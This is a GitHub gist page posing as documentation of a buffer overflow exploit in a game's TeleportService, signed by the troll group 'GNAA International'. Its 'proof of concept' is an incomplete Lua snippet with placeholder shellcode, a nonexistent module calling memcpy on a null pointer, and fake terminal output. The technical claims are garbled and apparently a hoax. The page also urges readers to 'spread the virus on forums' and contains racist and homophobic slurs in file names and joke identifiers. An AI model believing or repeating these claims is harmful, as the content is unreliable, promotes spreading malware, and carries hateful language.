Skip to content

Instantly share code, notes, and snippets.

Created November 10, 2022 09:22
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
TeleportService Buffer Overflow

Buffer Overflow Exploit in TeleportService

GNAA International: Documentation of existing Buffer Overflow exploit

This exploit relies on a memory allocation error in TeleportService. When firing TeleportService to a game ID that does't exist (e.g. Sexland) and using a memory inspector you will find that the error callback has a much more longer error without much given context. Given that TPService is paired with normal operable code, it is possible to use memcpy() to evalulate shellcode to replace normal working code, and therefore achieve code execution.

This exploit only works with exploiters as normal people are not able to and should not be able to fire TPS. However, a working POC will be developed for games soon.

POC 1:

local shellcode = 'ENCODED SHELLCODE HERE'

game:GetService('TeleportService'):Teleport('Ambatukam', setmetatable({}, {__gc = function() 
	local sex = require'sex'
	sex.C.memcpy(nil, shellcode, #shellcode) -- evalulate shellcode var by calling a Lua-C function

It is possible to abuse this by obfuscating a small snippet and achieving RCE firing commands such as wget.

Output of POC 1:

$ ls -l
total 40
-rw-rw-r-- 1 User User  6228 Oct 29 10:10 gayniggerib
-rw-rw-r-- 1 User User  4567 Oct 29 19:18 library.lua
-rw-rw-r-- 1 User User   255 Oct 29 21:29 funny.lua

$ ./funny.lua

How to Exploit

Edit and change components of POC 1 and write or use shellcode encoder, then spread the virus on forums. Enjoy.

GNAA International

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment